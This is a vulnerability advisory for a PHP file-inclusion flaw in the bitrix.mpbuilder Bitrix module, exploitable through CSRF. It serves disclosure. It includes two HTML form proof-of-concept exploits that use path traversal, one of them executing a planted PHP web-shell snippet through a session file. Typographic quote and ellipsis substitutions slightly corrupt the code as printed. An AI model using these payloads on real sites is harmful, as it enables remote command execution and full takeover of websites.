PHP File Inclusion in bitrix.mpbuilder Bitrix Module

High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website.

Access to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector.

The vulnerability exists due to insufficient filtration of “work[]” HTTP POST parameter in “/bitrix/admin/bitrix.mpbuilder_step2.php” script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system.

A simple exploit below will include and execute “/tmp/file” file:
<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog " method=“post” name=“main”>
<input type=“hidden” name=“save” value=“1”>
<input type=“hidden” name=“work[/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/tmp/file]” value=“1”>
<input value=“submit” id=“btn” type=“submit” />
</form>

In a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to <? exec($_POST[‘cmd’]); ?> and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious “NAME” value:

<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog " method=“post” name=“main”>
<input type=“hidden” name=“save” value=“1”>
<input type=“hidden” name=“work[/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/tmp/sess_[ SESSION_ID]]” value=“1”>
<input type=“hidden” name=“cmd” value=“ls”>
<input value=“submit” id=“btn” type=“submit” />
</form>